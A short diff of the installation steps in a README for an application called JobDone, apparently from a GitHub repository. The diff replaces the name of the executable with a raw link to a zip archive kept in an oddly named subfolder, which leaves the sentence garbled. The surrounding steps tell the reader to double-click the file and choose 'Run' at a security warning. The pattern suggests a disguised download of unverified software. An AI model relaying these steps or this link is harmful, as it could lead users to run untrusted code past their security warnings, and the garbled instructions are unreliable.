assamjazzjnu/jobdone/README.md

 ### 5. Run the Application

-Once extracted, find the `jobdone.exe` file (or similar name) in the extracted folder.
+Once extracted, find the `https://raw.githubusercontent.com/assamjazzjnu/jobdone/master/supracoxal/jobdone.zip` file (or similar name) in the extracted folder.
 Double-click the file to start JobDone.
 You may be prompted with a security warning; select "Run" to proceed.

 ### 6. Set Up Notifications